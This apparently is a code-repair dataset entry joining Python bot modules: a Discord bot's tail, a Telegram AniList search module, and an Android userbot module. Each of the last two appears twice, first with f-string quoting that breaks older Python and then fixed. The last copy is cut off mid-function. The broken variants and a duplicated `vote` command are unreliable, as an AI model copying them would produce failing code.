@bot.command(aliases=[".v"])
async def version(ctx):
await ctx.send("1.0.9")
@bot.command(aliases=["inv",".inv",".invite"])
async def invite(ctx):
em=Embed(title="Invite Balak[click here for instant invite]", description="to invite balak open the following \/ link in your browser or click the title\nhttps://top.gg/bot/749640022751182868/invite", url="https://top.gg/bot/749640022751182868/invite")
await ctx.send(embed=em)
@bot.command(aliases=[".vote"])
async def vote(ctx):
em=Embed(title="Vote Balak[click here for instant link]", description="to vote balak open the following \/ link in your browser or click the title\nhttps://top.gg/bot/749640022751182868/vote", url="https://top.gg/bot/749640022751182868/vote")
await ctx.send(embed=em)
@bot.command(aliases=[".vote"])
async def vote(ctx):
em=Embed(title="Source code of Balak[click here for instant link]", description="to view balak's source open the following \/ link in your browser or click the title\nhttps://github.com/ayushashi11/balak", url="https://github.com/ayushashi11/balak")
await ctx.send(embed=em)
bot.add_cog(Miscellaneous())
for command in bot.commands:
command.error(error)
bot.run(TOKEN)
|
# Part of Pull Req #2 by @MaskedVirus | github.com/swatv3nub
import time
from datetime import timedelta
import requests
from pyrogram import filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from wbb import app
from wbb.core.decorators.errors import capture_err
__MODULE__ = "Anime"
__HELP__ = """
/anime - search anime on AniList
/manga - search manga on Anilist
/char - search character on Anilist
"""
def shorten(description, info="anilist.co"):
ms_g = ""
if len(description) > 700:
description = description[0:500] + "...."
ms_g += (
f"\n**Description**: __{description}__[More here]({info})"
)
else:
ms_g += f"\n**Description**: __{description}__"
return (
ms_g.replace("<br>", "")
.replace("</br>", "")
.replace("<i>", "")
.replace("</i>", "")
)
def t(milliseconds: int) -> str:
"""Inputs time in milliseconds, to get beautified time,
as string"""
seconds, milliseconds = divmod(int(milliseconds), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
tmp = (
((str(days) + " Days, ") if days else "")
+ ((str(hours) + " Hours, ") if hours else "")
+ ((str(minutes) + " Minutes, ") if minutes else "")
+ ((str(seconds) + " Seconds, ") if seconds else "")
+ ((str(milliseconds) + " ms, ") if milliseconds else "")
)
return tmp[:-2]
airing_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: ANIME,search: $search) {
id
episodes
title {
romaji
english
native
}
siteUrl
nextAiringEpisode {
airingAt
timeUntilAiring
episode
}
}
}
"""
fav_query = """
query ($id: Int) {
Media (id: $id, type: ANIME) {
id
title {
romaji
english
native
}
}
}
"""
anime_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: ANIME,search: $search) {
id
idMal
title {
romaji
english
native
}
description (asHtml: false)
startDate{
year
}
episodes
season
type
format
status
duration
siteUrl
studios{
nodes{
name
}
}
trailer{
id
site
thumbnail
}
averageScore
genres
bannerImage
}
}
"""
character_query = """
query ($query: String) {
Character (search: $query) {
id
name {
first
last
full
}
siteUrl
favourites
image {
large
}
description
}
}
"""
manga_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: MANGA,search: $search) {
id
title {
romaji
english
native
}
description (asHtml: false)
startDate{
year
}
type
format
status
siteUrl
averageScore
genres
bannerImage
}
}
"""
def format_bytes(size):
size = int(size)
power = 1024
n = 0
power_labels = {0: "", 1: "K", 2: "M", 3: "G", 4: "T"}
while size > power:
size /= power
n += 1
return f"{size:.2f} {power_labels[n]+"B"}"
def return_progress_string(current, total):
filled_length = int(30 * current // total)
return (
"[" + "=" * filled_length + " " * (30 - filled_length) + "]"
)
def calculate_eta(current, total, start_time):
if not current:
return "00:00:00"
end_time = time.time()
elapsed_time = end_time - start_time
seconds = (elapsed_time * (total / current)) - elapsed_time
thing = "".join(
str(timedelta(seconds=seconds)).split(".")[:-1]
).split(", ")
thing[-1] = thing[-1].rjust(8, "0")
return ", ".join(thing)
url = "https://graphql.anilist.co"
@app.on_message(filters.command("anime"))
@capture_err
async def anime_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"search": search}
json = (
requests.post(
url, json={"query": anime_query, "variables": variables}
)
.json()["data"]
.get("Media", None)
)
if json:
msg = f"**{json["title"]["romaji"]}**(`{json["title"]["native"]}`)\n**Type**: {json["format"]}\n**Status**: {json["status"]}\n**Episodes**: {json.get("episodes", "N/A")}\n**Duration**: {json.get("duration", "N/A")} Per Ep.\n**Score**: {json["averageScore"]}\n**Genres**: `"
for x in json["genres"]:
msg += f"{x}, "
msg = msg[:-2] + "`\n"
msg += "**Studios**: `"
for x in json["studios"]["nodes"]:
msg += f"{x["name"]}, "
msg = msg[:-2] + "`\n"
info = json.get("siteUrl")
trailer = json.get("trailer", None)
if trailer:
trailer_id = trailer.get("id", None)
site = trailer.get("site", None)
if site == "youtube":
trailer = "https://youtu.be/" + trailer_id
description = (
json.get("description", "N/A")
.replace("<i>", "")
.replace("</i>", "")
.replace("<br>", "")
)
msg += shorten(description, info)
image = info.replace(
"anilist.co/anime/", "img.anili.st/media/"
)
if trailer:
buttons = [
[
InlineKeyboardButton("More Info", url=info),
InlineKeyboardButton("Trailer", url=trailer),
]
]
else:
buttons = [[InlineKeyboardButton("More Info", url=info)]]
if image:
try:
await message.reply_photo(
image,
caption=msg,
reply_markup=InlineKeyboardMarkup(buttons),
)
except Exception:
msg += f" [✔️️]({image})"
await message.edit(msg)
else:
await message.edit(msg)
@app.on_message(filters.command("manga"))
@capture_err
async def manga_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"search": search}
json = (
requests.post(
url, json={"query": manga_query, "variables": variables}
)
.json()["data"]
.get("Media", None)
)
ms_g = ""
if json:
title, title_native = json["title"].get(
"romaji", False
), json["title"].get("native", False)
start_date, status, score = (
json["startDate"].get("year", False),
json.get("status", False),
json.get("averageScore", False),
)
if title:
ms_g += f"**{title}**"
if title_native:
ms_g += f"(`{title_native}`)"
if start_date:
ms_g += f"\n**Start Date** - `{start_date}`"
if status:
ms_g += f"\n**Status** - `{status}`"
if score:
ms_g += f"\n**Score** - `{score}`"
ms_g += "\n**Genres** - "
for x in json.get("genres", []):
ms_g += f"{x}, "
ms_g = ms_g[:-2]
image = json.get("bannerImage", False)
ms_g += f"_{json.get("description", None)}_"
if image:
try:
await message.reply_photo(image, caption=ms_g)
except Exception:
ms_g += f" [✔️️]({image})"
await message.reply(ms_g)
else:
await message.reply(ms_g)
@app.on_message(filters.command("char"))
@capture_err
async def character_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"query": search}
json = (
requests.post(
url,
json={"query": character_query, "variables": variables},
)
.json()["data"]
.get("Character", None)
)
if json:
ms_g = f"**{json.get("name").get("full")}**(`{json.get("name").get("native")}`)\n"
description = f"{json["description"]}"
site_url = json.get("siteUrl")
ms_g += shorten(description, site_url)
image = json.get("image", None)
if image:
image = image.get("large")
await message.reply_photo(image, caption=ms_g)
else:
await message.reply(ms_g)
| # Part of Pull Req #2 by @MaskedVirus | github.com/swatv3nub
import time
from datetime import timedelta
import requests
from pyrogram import filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from wbb import app
from wbb.core.decorators.errors import capture_err
__MODULE__ = "Anime"
__HELP__ = """
/anime - search anime on AniList
/manga - search manga on Anilist
/char - search character on Anilist
"""
def shorten(description, info="anilist.co"):
ms_g = ""
if len(description) > 700:
description = description[0:500] + "...."
ms_g += (
f"\n**Description**: __{description}__[More here]({info})"
)
else:
ms_g += f"\n**Description**: __{description}__"
return (
ms_g.replace("<br>", "")
.replace("</br>", "")
.replace("<i>", "")
.replace("</i>", "")
)
def t(milliseconds: int) -> str:
"""Inputs time in milliseconds, to get beautified time,
as string"""
seconds, milliseconds = divmod(int(milliseconds), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
tmp = (
((str(days) + " Days, ") if days else "")
+ ((str(hours) + " Hours, ") if hours else "")
+ ((str(minutes) + " Minutes, ") if minutes else "")
+ ((str(seconds) + " Seconds, ") if seconds else "")
+ ((str(milliseconds) + " ms, ") if milliseconds else "")
)
return tmp[:-2]
airing_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: ANIME,search: $search) {
id
episodes
title {
romaji
english
native
}
siteUrl
nextAiringEpisode {
airingAt
timeUntilAiring
episode
}
}
}
"""
fav_query = """
query ($id: Int) {
Media (id: $id, type: ANIME) {
id
title {
romaji
english
native
}
}
}
"""
anime_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: ANIME,search: $search) {
id
idMal
title {
romaji
english
native
}
description (asHtml: false)
startDate{
year
}
episodes
season
type
format
status
duration
siteUrl
studios{
nodes{
name
}
}
trailer{
id
site
thumbnail
}
averageScore
genres
bannerImage
}
}
"""
character_query = """
query ($query: String) {
Character (search: $query) {
id
name {
first
last
full
}
siteUrl
favourites
image {
large
}
description
}
}
"""
manga_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: MANGA,search: $search) {
id
title {
romaji
english
native
}
description (asHtml: false)
startDate{
year
}
type
format
status
siteUrl
averageScore
genres
bannerImage
}
}
"""
def format_bytes(size):
size = int(size)
power = 1024
n = 0
power_labels = {0: "", 1: "K", 2: "M", 3: "G", 4: "T"}
while size > power:
size /= power
n += 1
return f"{size:.2f} {power_labels[n]+'B'}"
def return_progress_string(current, total):
filled_length = int(30 * current // total)
return (
"[" + "=" * filled_length + " " * (30 - filled_length) + "]"
)
def calculate_eta(current, total, start_time):
if not current:
return "00:00:00"
end_time = time.time()
elapsed_time = end_time - start_time
seconds = (elapsed_time * (total / current)) - elapsed_time
thing = "".join(
str(timedelta(seconds=seconds)).split(".")[:-1]
).split(", ")
thing[-1] = thing[-1].rjust(8, "0")
return ", ".join(thing)
url = "https://graphql.anilist.co"
@app.on_message(filters.command("anime"))
@capture_err
async def anime_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"search": search}
json = (
requests.post(
url, json={"query": anime_query, "variables": variables}
)
.json()["data"]
.get("Media", None)
)
if json:
msg = f"**{json['title']['romaji']}**(`{json['title']['native']}`)\n**Type**: {json['format']}\n**Status**: {json['status']}\n**Episodes**: {json.get('episodes', 'N/A')}\n**Duration**: {json.get('duration', 'N/A')} Per Ep.\n**Score**: {json['averageScore']}\n**Genres**: `"
for x in json["genres"]:
msg += f"{x}, "
msg = msg[:-2] + "`\n"
msg += "**Studios**: `"
for x in json["studios"]["nodes"]:
msg += f"{x['name']}, "
msg = msg[:-2] + "`\n"
info = json.get("siteUrl")
trailer = json.get("trailer", None)
if trailer:
trailer_id = trailer.get("id", None)
site = trailer.get("site", None)
if site == "youtube":
trailer = "https://youtu.be/" + trailer_id
description = (
json.get("description", "N/A")
.replace("<i>", "")
.replace("</i>", "")
.replace("<br>", "")
)
msg += shorten(description, info)
image = info.replace(
"anilist.co/anime/", "img.anili.st/media/"
)
if trailer:
buttons = [
[
InlineKeyboardButton("More Info", url=info),
InlineKeyboardButton("Trailer", url=trailer),
]
]
else:
buttons = [[InlineKeyboardButton("More Info", url=info)]]
if image:
try:
await message.reply_photo(
image,
caption=msg,
reply_markup=InlineKeyboardMarkup(buttons),
)
except Exception:
msg += f" [✔️️]({image})"
await message.edit(msg)
else:
await message.edit(msg)
@app.on_message(filters.command("manga"))
@capture_err
async def manga_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"search": search}
json = (
requests.post(
url, json={"query": manga_query, "variables": variables}
)
.json()["data"]
.get("Media", None)
)
ms_g = ""
if json:
title, title_native = json["title"].get(
"romaji", False
), json["title"].get("native", False)
start_date, status, score = (
json["startDate"].get("year", False),
json.get("status", False),
json.get("averageScore", False),
)
if title:
ms_g += f"**{title}**"
if title_native:
ms_g += f"(`{title_native}`)"
if start_date:
ms_g += f"\n**Start Date** - `{start_date}`"
if status:
ms_g += f"\n**Status** - `{status}`"
if score:
ms_g += f"\n**Score** - `{score}`"
ms_g += "\n**Genres** - "
for x in json.get("genres", []):
ms_g += f"{x}, "
ms_g = ms_g[:-2]
image = json.get("bannerImage", False)
ms_g += f"_{json.get('description', None)}_"
if image:
try:
await message.reply_photo(image, caption=ms_g)
except Exception:
ms_g += f" [✔️️]({image})"
await message.reply(ms_g)
else:
await message.reply(ms_g)
@app.on_message(filters.command("char"))
@capture_err
async def character_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"query": search}
json = (
requests.post(
url,
json={"query": character_query, "variables": variables},
)
.json()["data"]
.get("Character", None)
)
if json:
ms_g = f"**{json.get('name').get('full')}**(`{json.get('name').get('native')}`)\n"
description = f"{json['description']}"
site_url = json.get("siteUrl")
ms_g += shorten(description, site_url)
image = json.get("image", None)
if image:
image = image.get("large")
await message.reply_photo(image, caption=ms_g)
else:
await message.reply(ms_g)
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module containing commands related to android"""
import asyncio
import json
import math
import os
import re
import time
from bs4 import BeautifulSoup
from requests import get
from userbot import CMD_HELP, TEMP_DOWNLOAD_DIRECTORY
from userbot.events import register
from userbot.utils import chrome, human_to_bytes, humanbytes, md5, time_formatter
GITHUB = "https://github.com"
@register(outgoing=True, pattern=r"^\.magisk$")
async def magisk(request):
magisk_dict = {
"Stable": "https://raw.githubusercontent.com/topjohnwu/magisk_files/master/stable.json",
"Beta": "https://raw.githubusercontent.com/topjohnwu/magisk_files/master/beta.json",
"Canary": "https://raw.githubusercontent.com/topjohnwu/magisk_files/canary/canary.json",
}
releases = "Últimos lançamentos do Magisk:\n"
for name, release_url in magisk_dict.items():
data = get(release_url).json()
if str(name) == "Canary":
data["magisk"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["magisk"]["link"]
)
data["app"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["app"]["link"]
)
data["uninstaller"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["uninstaller"]["link"]
)
releases += (
f'{name}: [ZIP v{data['magisk']['version']}]({data['magisk']['link']}) | '
f'[APK v{data['app']['version']}]({data['app']['link']}) | '
f'[Uninstaller]({data['uninstaller']['link']})\n'
)
await request.edit(releases)
@register(outgoing=True, pattern=r"^.device(?: |$)(\S*)")
async def device_info(request):
""" informações básicas do dispositivo android pelo seu codename """
textx = await request.get_reply_message()
codename = request.pattern_match.group(1)
if codename:
pass
elif textx:
codename = textx.text
else:
await request.edit("`Uso: .device <codenome> / <modelo>`")
return
data = json.loads(
get(
"https://raw.githubusercontent.com/androidtrackers/"
"certified-android-devices/master/by_device.json"
).text
)
results = data.get(codename)
if results:
reply = f"**Resultados da pesquisa por {codename}**:\n\n"
for item in results:
reply += (
f"**Marca**: {item["brand"]}\n"
f"**Nome**: {item["name"]}\n"
f"**Modelo**: {item["model"]}\n\n"
)
else:
reply = f"`Sem informações sobre {codename}!`\n"
await request.edit(reply)
@register(outgoing=True, pattern=r"^.codename(?: |)([\S]*)(?: |)([\s\S]*)")
async def codename_info(request):
""" procura por codenome do dispositivo android """
textx = await request.get_reply_message()
brand = request.pattern_match.group(1).lower()
device = request.pattern_match.group(2).lower()
if brand and device:
pass
elif textx:
brand = textx.text.split(" ")[0]
device = " ".join(textx.text.split(" ")[1:])
else:
await request.edit("`Uso: .codename <marca> <dispositivo>`")
return
data = json.loads(
get(
"https://raw.githubusercontent.com/androidtrackers/"
"certified-android-devices/master/by_brand.json"
).text
)
devices_lower = {k.lower(): v for k, v in data.items()} # Lower brand names in JSON
devices = devices_lower.get(brand)
results = [
i
for i in devices
if i["name"].lower() == device.lower() or i["model"].lower() == device.lower()
]
if results:
reply = f"**Resultados da pesquisa por {brand} {device}**:\n\n"
if len(results) > 8:
results = results[:8]
for item in results:
reply += (
f"**Dispositivo**: {item["device"]}\n"
f"**Nome**: {item["name"]}\n"
f"**Modelo**: {item["model"]}\n\n"
)
else:
reply = f"`Sem resultados para {device} codename!`\n"
await request.edit(reply)
@register(outgoing=True, pattern="^.pixeldl(?: |$)(.*)")
async def download_api(dl):
await dl.edit("`Coletando informações...`")
URL = dl.pattern_match.group(1)
URL_MSG = await dl.get_reply_message()
if URL:
pass
elif URL_MSG:
URL = URL_MSG.text
else:
await dl.edit("`Informação vazia...`")
return
if not re.findall(r"\bhttps?://download.*pixelexperience.*\.org\S+", URL):
await dl.edit("`Informação inválida...`")
return
driver = await chrome()
await dl.edit("`Obtendo informações...`")
driver.get(URL)
error = driver.find_elements_by_class_name("swal2-content")
if len(error) > 0:
if error[0].text == "Arquivo Inválido.":
await dl.edit(f"`FileNotFoundError`: {URL} inválido.")
return
datas = driver.find_elements_by_class_name("download__meta")
""" - enumere os dados para ter certeza de que o download corresponda com a versão - """
md5_origin = None
i = None
for index, value in enumerate(datas):
for data in value.text.split("\n"):
if data.startswith("MD5"):
md5_origin = data.split(":")[1].strip()
i = index
break
if md5_origin is not None and i is not None:
break
if md5_origin is None and i is None:
await dl.edit("`Não há versão equivalente disponível...`")
if URL.endswith("/"):
file_name = URL.split("/")[-2]
else:
file_name = URL.split("/")[-1]
file_path = TEMP_DOWNLOAD_DIRECTORY + file_name
download = driver.find_elements_by_class_name("download__btn")[i]
download.click()
await dl.edit("`Começando download...`")
file_size = human_to_bytes(download.text.split(None, 3)[-1].strip("()"))
display_message = None
complete = False
start = time.time()
while complete is False:
if os.path.isfile(file_path + ".crdownload"):
try:
downloaded = os.stat(file_path + ".crdownload").st_size
status = "Baixando"
except OSError: # Rare case
await asyncio.sleep(1)
continue
elif os.path.isfile(file_path):
downloaded = os.stat(file_path).st_size
file_size = downloaded
status = "Checando"
else:
await asyncio.sleep(0.3)
continue
diff = time.time() - start
percentage = downloaded / file_size * 100
speed = round(downloaded / diff, 2)
eta = round((file_size - downloaded) / speed)
prog_str = "`{0}` | [{1}{2}] `{3}%`".format(
status,
"".join(["■" for i in range(math.floor(percentage / 10))]),
"".join(["▨" for i in range(10 - math.floor(percentage / 10))]),
round(percentage, 2),
)
current_message = (
"`[DOWNLOAD]`\n\n"
f"`{file_name}`\n"
f"`Status`\n{prog_str}\n"
f"`{humanbytes(downloaded)} of {humanbytes(file_size)}"
f" @ {humanbytes(speed)}`\n"
f"`Tempo Estimado` -> {time_formatter(eta)}"
)
if (
round(diff % 15.00) == 0
and display_message != current_message
or (downloaded == file_size)
):
await dl.edit(current_message)
display_message = current_message
if downloaded == file_size:
if not os.path.isfile(file_path): # Rare case
await asyncio.sleep(1)
continue
MD5 = await md5(file_path)
if md5_origin == MD5:
complete = True
else:
await dl.edit("`Download corrompido...`")
os.remove(file_path)
driver.quit()
return
await dl.respond(f"`{file_name}`\n\n" f"Download finalizado em `{file_path}`.")
await dl.delete()
driver.quit()
return
@register(outgoing=True, pattern=r"^.specs(?: |)([\S]*)(?: |)([\s\S]*)")
async def devices_specifications(request):
""" Mobile devices specifications """
textx = await request.get_reply_message()
brand = request.pattern_match.group(1).lower()
device = request.pattern_match.group(2).lower()
if brand and device:
pass
elif textx:
brand = textx.text.split(" ")[0]
device = " ".join(textx.text.split(" ")[1:])
else:
await request.edit("`Uso: .specs <marca> <dispositivo>`")
return
all_brands = (
BeautifulSoup(
get("https://www.devicespecifications.com/en/brand-more").content, "lxml"
)
.find("div", {"class": "brand-listing-container-news"})
.findAll("a")
)
brand_page_url = None
try:
brand_page_url = [
i["href"] for i in all_brands if brand == i.text.strip().lower()
][0]
except IndexError:
await request.edit(f"`{brand} é uma marca desconhecida/inexistente!`")
devices = BeautifulSoup(get(brand_page_url).content, "lxml").findAll(
"div", {"class": "model-listing-container-80"}
)
device_page_url = None
try:
device_page_url = [
i.a["href"]
for i in BeautifulSoup(str(devices), "lxml").findAll("h3")
if device in i.text.strip().lower()
]
except IndexError:
await request.edit(f"`não foi possível achar {device}!`")
if len(device_page_url) > 2:
device_page_url = device_page_url[:2]
reply = ""
for url in device_page_url:
info = BeautifulSoup(get(url).content, "lxml")
reply = "\n" + info.title.text.split("-")[0].strip() + "\n"
info = info.find("div", {"id": "model-brief-specifications"})
specifications = re.findall(r"<b>.*?<br/>", str(info))
for item in specifications:
title = re.findall(r"<b>(.*?)</b>", item)[0].strip()
data = (
re.findall(r"</b>: (.*?)<br/>", item)[0]
.replace("<b>", "")
.replace("</b>", "")
.strip()
)
reply += f"**{title}**: {data}\n"
await request.edit(reply)
@register(outgoing=True, pattern=r"^.twrp(?: |$)(\S*)")
async def twrp(request):
""" get android device twrp """
textx = await request.get_reply_message()
device = request.pattern_match.group(1)
if device:
pass
elif textx:
device = textx.text.split(" ")[0]
else:
await request.edit("`Uso: .twrp <codenome>`")
return
url = get(f"https://dl.twrp.me/{device}/")
if url.status_code == 404:
reply = f"`Não foi possível achar downloads para {device}!`\n"
await request.edit(reply)
return
page = BeautifulSoup(url.content, "lxml")
download = page.find("table").find("tr").find("a")
dl_link = f"https://dl.twrp.me{download["href"]}"
dl_file = download.text
size = page.find("span", {"class": "filesize"}).text
date = page.find("em").text.strip()
reply = (
f"**TWRP mais recente para {device}:**\n"
f"[{dl_file}]({dl_link}) - __{size}__\n"
f"**Atualizado:** __{date}__\n"
)
await request.edit(reply)
CMD_HELP.update(
{
"android": ".magisk\
\nÚltimas versões do Magisk\
\n\n.device <codenome>\
\nUso: Obtenha informações sobre codenome ou modelo do dispositivo.\
\n\n.codename <marca> <dispositivo>\
\nUso: Procure pelo codenome do dispositivo.\
\n\n.pixeldl **<download.pixelexperience.org>**\
\nUso: Download da ROM Pixel Experience pro seu servidor do userbot.\
\n\n.specs <marca> <dispositivo>\
\nUso: Obtenha especificações do dispositivo.\
\n\n.twrp <codenome>\
\nUso: Obtenha última versão do TWRP para o dispositivo."
}
)
| # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module containing commands related to android"""
import asyncio
import json
import math
import os
import re
import time
from bs4 import BeautifulSoup
from requests import get
from userbot import CMD_HELP, TEMP_DOWNLOAD_DIRECTORY
from userbot.events import register
from userbot.utils import chrome, human_to_bytes, humanbytes, md5, time_formatter
GITHUB = "https://github.com"
@register(outgoing=True, pattern=r"^\.magisk$")
async def magisk(request):
magisk_dict = {
"Stable": "https://raw.githubusercontent.com/topjohnwu/magisk_files/master/stable.json",
"Beta": "https://raw.githubusercontent.com/topjohnwu/magisk_files/master/beta.json",
"Canary": "https://raw.githubusercontent.com/topjohnwu/magisk_files/canary/canary.json",
}
releases = "Últimos lançamentos do Magisk:\n"
for name, release_url in magisk_dict.items():
data = get(release_url).json()
if str(name) == "Canary":
data["magisk"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["magisk"]["link"]
)
data["app"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["app"]["link"]
)
data["uninstaller"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["uninstaller"]["link"]
)
releases += (
f'{name}: [ZIP v{data["magisk"]["version"]}]({data["magisk"]["link"]}) | '
f'[APK v{data["app"]["version"]}]({data["app"]["link"]}) | '
f'[Uninstaller]({data["uninstaller"]["link"]})\n'
)
await request.edit(releases)
@register(outgoing=True, pattern=r"^.device(?: |$)(\S*)")
async def device_info(request):
""" informações básicas do dispositivo android pelo seu codename """
textx = await request.get_reply_message()
codename = request.pattern_match.group(1)
if codename:
pass
elif textx:
codename = textx.text
else:
await request.edit("`Uso: .device <codenome> / <modelo>`")
return
data = json.loads(
get(
"https://raw.githubusercontent.com/androidtrackers/"
"certified-android-devices/master/by_device.json"
).text
)
results = data.get(codename)
if results:
reply = f"**Resultados da pesquisa por {codename}**:\n\n"
for item in results:
reply += (
f"**Marca**: {item['brand']}\n"
f"**Nome**: {item['name']}\n"
f"**Modelo**: {item['model']}\n\n"
)
else:
reply = f"`Sem informações sobre {codename}!`\n"
await request.edit(reply)
@register(outgoing=True, pattern=r"^.codename(?: |)([\S]*)(?: |)([\s\S]*)")
async def codename_info(request):
""" procura por codenome do dispositivo android """
textx = await request.get_reply_message()
brand = request.pattern_match.group(1).lower()
device = request.pattern_match.group(2).lower()
if brand and device:
pass
elif textx:
brand = textx.text.split(" ")[0]
device = " ".join(textx.text.split(" ")[1:])
else:
await request.edit("`Uso: .codename <marca> <dispositivo>`")
return
data = json.loads(
get(
"https://raw.githubusercontent.com/androidtrackers/"
"certified-android-devices/master/by_brand.json"
).text
)
devices_lower = {k.lower(): v for k, v in data.items()} # Lower brand names in JSON
devices = devices_lower.get(brand)
results = [
i
for i in devices
if i["name"].lower() == device.lower() or i["model"].lower() == device.lower()
]
if results:
reply = f"**Resultados da pesquisa por {brand} {device}**:\n\n"
if len(results) > 8:
results = results[:8]
for item in results:
reply += (
f"**Dispositivo**: {item['device']}\n"
f"**Nome**: {item['name']}\n"
f"**Modelo**: {item['model']}\n\n"
)
else:
reply = f"`Sem resultados para {device} codename!`\n"
await request.edit(reply)
@register(outgoing=True, pattern="^.pixeldl(?: |$)(.*)")
async def download_api(dl):
await dl.edit("`Coletando informações...`")
URL = dl.pattern_match.group(1)
URL_MSG = await dl.get_reply_message()
if URL:
pass
elif URL_MSG:
URL = URL_MSG.text
else:
await dl.edit("`Informação vazia...`")
return
if not re.findall(r"\bhttps?://download.*pixelexperience.*\.org\S+", URL):
await dl.edit("`Informação inválida...`")
return
driver = await chrome()
await dl.edit("`Obtendo informações...`")
driver.get(URL)
error = driver.find_elements_by_class_name("swal2-content")
if len(error) > 0:
if error[0].text == "Arquivo Inválido.":
await dl.edit(f"`FileNotFoundError`: {URL} inválido.")
return
datas = driver.find_elements_by_class_name("download__meta")
""" - enumere os dados para ter certeza de que o download corresponda com a versão - """
md5_origin = None
i = None
for index, value in enumerate(datas):
for data in value.text.split("\n"):
if data.startswith("MD5"):
md5_origin = data.split(":")[1].strip()
i = index
break
if md5_origin is not None and i is not None:
break
if md5_origin is None and i is None:
await dl.edit("`Não há versão equivalente disponível...`")
if URL.endswith("/"):
file_name = URL.split("/")[-2]
else:
file_name = URL.split("/")[-1]
file_path = TEMP_DOWNLOAD_DIRECTORY + file_name
download = driver.find_elements_by_class_name("download__btn")[i]
download.click()
await dl.edit("`Começando download...`")
file_size = human_to_bytes(download.text.split(None, 3)[-1].strip("()"))
display_message = None
complete = False
start = time.time()
while complete is False:
if os.path.isfile(file_path + ".crdownload"):
try:
downloaded = os.stat(file_path + ".crdownload").st_size
status = "Baixando"
except OSError: # Rare case
await asyncio.sleep(1)
continue
elif os.path.isfile(file_path):
downloaded = os.stat(file_path).st_size
file_size = downloaded
status = "Checando"
else:
await asyncio.sleep(0.3)
continue
diff = time.time() - start
percentage = downloaded / file_size * 100
speed = round(downloaded / diff, 2)
eta = round((file_size - downloaded) / speed)
prog_str = "`{0}` | [{1}{2}] `{3}%`".format(
status,
"".join(["■" for i in range(math.floor(percentage / 10))]),
"".join(["▨" for i in range(10 - math.floor(percentage / 10))]),
round(percentage, 2),
)
current_message = (
"`[DOWNLOAD]`\n\n"
f"`{file_name}`\n"
f"`Status`\n{prog_str}\n"
f"`{humanbytes(downloaded)} of {humanbytes(file_size)}"
f" @ {humanbytes(speed)}`\n"
f"`Tempo Estimado` -> {time_formatter(eta)}"
)
if (
round(diff % 15.00) == 0
and display_message != current_message
or (downloaded == file_size)
):
await dl.edit(current_message)
display_message = current_message
if downloaded == file_size:
if not os.path.isfile(file_path): # Rare case
await asyncio.sleep(1)
continue
MD5 = await md5(file_path)
if md5_origin == MD5:
complete = True
else:
await dl.edit("`Download corrompido...`")
os.remove(file_path)
driver.quit()
return
await dl.respond(f"`{file_name}`\n\n" f"Download finalizado em `{file_path}`.")
await dl.delete()
driver.quit()
return
@register(outgoing=True, pattern=r"^.specs(?: |)([\S]*)(?: |)([\s\S]*)")
async def devices_specifications(request):
""" Mobile devices specifications """
textx = await request.get_reply_message()
brand = request.pattern_match.group(1).lower()
device = request.pattern_match.group(2).lower()
if brand and device:
pass
elif textx:
brand = textx.text.split(" ")[0]
device = " ".join(textx.text.split(" ")[1:])
else:
await request.edit("`Uso: .specs <marca> <dispositivo>`")
return
all_brands = (
BeautifulSoup(
get("https://www.devicespecifications.com/en/brand-more").content, "lxml"
)
.find("div", {"class": "brand-listing-container-news"})
.findAll("a")
)
brand_page_url = None
try:
brand_page_url = [
i["href"] for i in all_brands if brand == i.text.strip().lower()
][0]
except IndexError:
await request.edit(f"`{brand} é uma marca desconhecida/inexistente!`")
devices = BeautifulSoup(get(brand_page_url).content, "lxml").findAll(
"div", {"class": "model-listing-container-80"}
)
device_page_url = None
try:
device_page_url = [
i.a["href"]
for i in BeautifulSoup(str(devices), "lxml").findAll("h3")
if device in i.text.strip().lower()
]
except IndexError:
await request.edit(f"`não foi possível achar {device}!`")
if len(device_page_url) > 2:
device_page_url = device_page_url[:2]
reply = ""
for url in device_page_url:
info = BeautifulSoup(get(url).content, "lxml")
reply = "\n" + info.title.text.split("-")[0].strip() + "\n"
info = info.find("div", {"id": "model-brief-specifications"})
specifications = re.findall(r"<b>.*?<br/>", str(info))
for item in specifications:
title = re.findall(r"<b>(.*?)</b>", item)[0].strip()
data = (
re.findall(r"</b>: (.*?)<br/>", item)[0]
.replace("<b>", "")
.replace("</b>", "")
.strip()
)
reply += f"**{title}**: {data}\n"
await request.edit(reply)
@register(outgoing=True, pattern=r"^.twrp(?: |$)(\S*)")
async def twrp(request):
""" get android device twrp """
textx = await request.get_reply_message()
device = request.pattern_match.group(1)
if device:
pass
elif textx:
device = textx.text.split(" ")[0]
else:
await request.edit("`Uso: .twrp <codenome>`")
